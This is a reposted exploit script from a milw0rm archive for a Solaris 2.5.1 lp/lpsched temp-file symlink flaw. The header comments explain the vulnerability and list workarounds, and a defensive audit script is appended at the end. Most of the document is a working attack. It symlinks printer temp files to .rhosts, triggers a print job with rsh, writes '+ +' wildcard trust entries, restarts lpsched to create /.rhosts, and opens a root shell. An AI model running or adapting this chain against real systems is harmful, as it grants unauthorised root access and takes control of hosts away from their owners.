FlyFar

Solaris 2.5.1 lp / lpsched - Symlink

Feb 25th, 2024
#!/bin/sh
#
# lpNet & temp file exploit:
#   break lp, then use lp priv to break root (or bin, etc...).
#
#   Written by: Chris Sheldon (csh@viewgraphics.com)
#
#   Tested on Solaris-2.5.1:
#     SunOS testhost 5.5.1 Generic sun4m sparc SUNW,SPARCstation-20
#
#   Caveat: This system is running without patches. Sun released
#     patch 103959-03 for 2.5.1 on Feb 27, 1997. lpNet and lpsched
#     were replaced in that patch, but the patch README does not
#     mention anything about a temp file or permissions problem.
#     103959-03 is in the recommended patch list, but not in the
#     "Patches containing security fixes" list.
#
#   This way (not using HP JetAdmin) *seems* to only work when you have
#   a postscript-only defined printer. If you send an ascii job to the
#   print queue, lpNet will invoke several of the /usr/lib/lp/postscript
#   programs to convert the ascii into postscript. One of them, postio(1),
#   creates a temp file in /var/tmp mode 666. If the request is sent from
#   a remote system (e.g. handled by lpNet), then postio(1) runs as lp and
#   creates /var/tmp/<printer-name>.log as lp mode 666.
#
#   Here's part of the /var/lp/logs/request file:
#
#   = lp0-71, uid -1, gid -1, size 123, Sat May  3 03:26:14 PDT 1997
#   x /usr/lib/lp/postscript/postprint
#   y /usr/lib/lp/postscript/download -plp0|/usr/lib/lp/postscript/postio \
#       2>>$ERRFILE -L/var/tmp/lp0.log
#   t simple
#
#   What if you don't have a PS-only printer? Well, if you are using
#   the HP JetAdmin software and are running the hpnp daemon, then
#   you're just as vulnerable. The JetAdmin software creates a temp
#   file /var/tmp/jadump as lp with mode 666. It happily follows
#   symlinks.
#
#   So, the exploit essentially is:
#     ln -s ~lp/.rhosts /var/tmp/<printer-name>.log
#      -or-
#     ln -s ~lp/.rhosts /var/tmp/jadump
#     rsh somehost lp somefile.txt
#     echo "+ +" >> ~lp/.rhosts
#     rsh -l lp localhost /bin/sh -i
#     mv /var/lp/logs/lpsched /var/lp/logs/lpsched.save
#     ln -s /.rhosts /var/lp/logs/lpsched
#     /usr/sbin/lpshut
#     /usr/lib/lpsched
#     mv /var/lp/logs/lpsched.save /var/lp/logs/lpsched
#     echo "+ +" >> /.rhosts
#     rsh -l root localhost /bin/sh -i
#
#  Note: This won't clobber the permissions on an existing /.rhosts
#    file, but you can always symlink to /usr/bin/.rhosts.
#
#  Workaround:
#    Put "umask 022" in /etc/init.d/lp. /var/tmp/<printer-name>.log
#      will be mode 644. This also makes /var/lp/logs/lpsched
#      created as mode 644.
#    For /var/tmp/jadump, the umask trick didn't work. I just made
#    /usr/spool/lp 755 root/root (was 775 lp/lp).
#
#  I suppose as a general principle, it's a good thing to go around
#  as root and touch /.rhosts /usr/bin/.rhosts /usr/spool/lp/.rhosts
#  and /var/adm/.rhosts as 600 root/root. I also run a script which
#  checks the files (and their contents) on a regular basis.
#
#  Perhaps there should be a file called /etc/rusers which, like the
#  /etc/ftpusers file, denies any user in that file password-less
#  r-service access.
#
#  Of course, you still have to worry about things like .forward.
#  A more draconian approach would be to change /var/spool/lp to
#  mode 755 and owned by root. What would this break?? (anything?)
#
#  This is the JetAdmin/hpnpd script:
#

#
# Usage stuff.
if [ "$1" = "" ]; then
  echo "Usage: lp-exp <remote-host> [remote printer name]"
  echo "         remote-host: host must have networked printer"
  echo "           with the main spool on the local system."
  exit
else
  remlp=$1
fi

#
# Specify a different queue
if [ "$2" != "" ]; then
  remqn=$2
fi

#
# Check for ~lp/.rhosts
if [ -f /usr/spool/lp/.rhosts ]; then
  echo "lp's .rhosts file exists... sorry"
  exit
fi

#
# Check if hpnpd is running
if [ "`ps -e | grep hpnpd`" != "" ]; then
  echo "found hpnpd running"
  rm -f /var/tmp/jadump
  ln -s /usr/spool/lp/.rhosts /var/tmp/jadump
else
  echo "If you have a postscript only printer, try that (see comments)."
  exit
fi

#
# print some data on a remote system
if [ "$remlp" = "" ]; then
  rsh $remlp "echo ASCII-STRING | lp"
else
  rsh $remlp "echo ASCII-STRING | lp -d$remqn"
fi

sleep 3

#
# Check for the new .rhosts file and break root
if [ -f /usr/spool/lp/.rhosts ]; then
  rm -f /var/tmp/jadump
  echo "+ +" >> /usr/spool/lp/.rhosts

  rsh -l lp localhost "rm /usr/spool/lp/.rhosts ;\
   mv /var/lp/logs/lpsched /var/lp/logs/lpsched.save ;\
   ln -s /.rhosts /var/lp/logs/lpsched ;\
   /usr/sbin/lpshut ;\
   sleep 3 ;\
   /usr/lib/lpsched ;\
   mv /var/lp/logs/lpsched.save /var/lp/logs/lpsched ;\
   echo \"+ +\" >> /.rhosts"
else
  echo "Hmmm... no .rhosts file was created."
  exit
fi

rsh -l root localhost /bin/sh -i

#
#
#

# milw0rm.com [1997-05-03]

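The header comments recommend keeping the four .rhosts files as 600 root/root and checking them and their contents regularly. The following audit is an added example, not part of the original paste or the author's own script: the function name `audit_lp_symlink`, its root-prefix argument and the `EXPECT_UID` override are assumptions made so it can run against a constructed test tree.

```shell
#!/bin/sh
# Added example (not from the original paste): audit the files this advisory
# says are abused. $1 is a root prefix (assumption) so it can run on a test
# tree; pass "" on a live host. EXPECT_UID (assumption) defaults to 0 (root).

audit_lp_symlink() {
  root=$1
  want_uid=${EXPECT_UID:-0}
  # Guard files the author suggests keeping as empty 600 root/root files.
  for f in /.rhosts /usr/bin/.rhosts /usr/spool/lp/.rhosts /var/adm/.rhosts; do
    p=$root$f
    if [ -h "$p" ]; then echo "SYMLINK $f"; continue; fi
    if [ ! -f "$p" ]; then echo "MISSING $f"; continue; fi
    perms=$(ls -ld "$p" | cut -c1-10)
    owner=$(ls -ldn "$p" | awk '{print $3}')
    [ "$perms" = "-rw-------" ] || echo "MODE $f $perms"
    [ "$owner" = "$want_uid" ] || echo "OWNER $f uid=$owner"
    # Any line starting with "+" grants password-less r-service access.
    if grep -q '^[[:space:]]*+' "$p"; then echo "WILDCARD $f"; fi
  done
  # Files the print daemons create: must not be symlinks or world-writable.
  for p in "$root"/var/tmp/jadump "$root"/var/tmp/*.log \
           "$root"/var/lp/logs/lpsched; do
    f=${p#"$root"}
    if [ -h "$p" ]; then
      echo "SYMLINK $f -> $(ls -ld "$p" | sed 's/.* -> //')"
      continue
    fi
    [ -e "$p" ] || continue   # also skips an unmatched *.log glob
    perms=$(ls -ld "$p" | cut -c1-10)
    case $perms in ????????w?) echo "WORLD-WRITABLE $f $perms" ;; esac
  done
  return 0
}

# On a live host, call it with an empty prefix from cron:
# audit_lp_symlink ""
```

Each finding is one line (`SYMLINK`, `MISSING`, `MODE`, `OWNER`, `WILDCARD`, `WORLD-WRITABLE`), so empty output means the workaround state described in the comments holds.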